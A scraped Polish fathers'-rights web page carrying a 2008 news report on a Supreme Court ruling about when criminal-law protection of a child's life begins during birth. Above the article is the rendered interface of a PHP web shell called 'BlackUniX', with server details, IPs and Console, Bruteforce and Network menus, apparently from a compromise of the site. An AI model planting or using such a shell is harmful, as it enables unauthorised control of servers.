W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:50:28
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Ochronie podlega życie dziecka z początkiem porodu
31.10.2008.
Sąd Najwyższy wczoraj potwierdził, że Ochronie prawnokarnej podlega zdrowie i życie dziecka od momentu rozpoczęcia porodu: naturalnego bądź za pomocą cesarskiego cięcia lub od zaistnienia takiej konieczności.SN rozpatrywał pytanie Sądu Okręgowego w Poznaniu, czy ochronie prawnokarnej podlega życie dziecka od momentu rozpoczęcia porodu, czy też od momentu, gdy dziecko poczęte osiągnęło zdolność do samodzielnego życia poza organizmem kobiety.
SN przypomniał, że "pełna prawnokarna ochrona życia człowieka (...) rozpoczyna się z początkiem porodu (wystąpienie skurczów macicy, dających postęp porodu), (...) z chwilą podjęcia czynności bezpośrednio zmierzających do przeprowadzenia zabiegu cesarskiego cięcia (...) albo z chwilą zaistnienia konieczności medycznej przeprowadzenia zabiegu".

Zaznaczył, że "są to, zasadniczo różne z punktu widzenia medycyny, ale identyczne z punktu widzenia prawa karnego, sytuacje narodzin człowieka".

"Czynności zmierzające do przeprowadzenia zabiegu cięcia cesarskiego (...) mają swój początek (...) w procesie diagnostycznym, rozpoczynanym zazwyczaj od wywiadu chorobowego, za pomocą którego możliwe jest ustalenie, czy zachodzą wskazania do przeprowadzenia zabiegu" - podkreślił SN.

"Wystąpienie takiej konieczności wyznacza początek okresu, w którym powinno nastąpić oddzielenie dziecka od organizmu matki, co jest tożsame z okresem porodu w rozumieniu art. 149 kk" - podkreślił SN. Zaznaczył, że "od tej chwili przysługuje dziecku nienarodzonemu pełna prawnokarna ochrona przewidziana w obowiązującym kodeksie karnym dla człowieka".

SN najwyższy zaznaczył, że zauważa dysproporcję "w zakresie prawnokarnej ochrony życia dziecka nienarodzonego w okresie ciąży przebiegającej prawidłowo, zakończonej porodem naturalnym i w wypadku, gdy ciążę kończy zabieg operacyjny cięcia cesarskiego". Podkreślił, że chodzi tutaj o sytuacje, gdy zabieg "jest wykonywany w maksymalnie wczesnym okresie ciąży, gdy tylko dziecko nienarodzone osiągnęło wagę przekraczającą 500 g i dopiero co wykształcone zostały jego płuca".

"Z podejmowanymi wówczas czynnościami medycznymi, zmierzającymi do przeprowadzenia zabiegu może wiązać się odpowiedzialność karna dotycząca człowieka. W tym samym okresie, w wypadku ciąży przebiegającej prawidłowo, dziecko uzyskuje pełną ochronę prawnokarną dopiero z chwilą rozpoczęcia porodu naturalnego" - zauważył SN.

W ocenie sądu "dysproporcja w tym zakresie będzie narastać wraz z rozwojem medycyny", gdy będzie możliwe odłączenie od organizmu matki i utrzymanie życia dziecka w jeszcze wcześniejszym okresie ciąży. Zmiana takiej sytuacji leży - wg SN - w gestii ustawodawcy.

źródło informacji: PAP
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.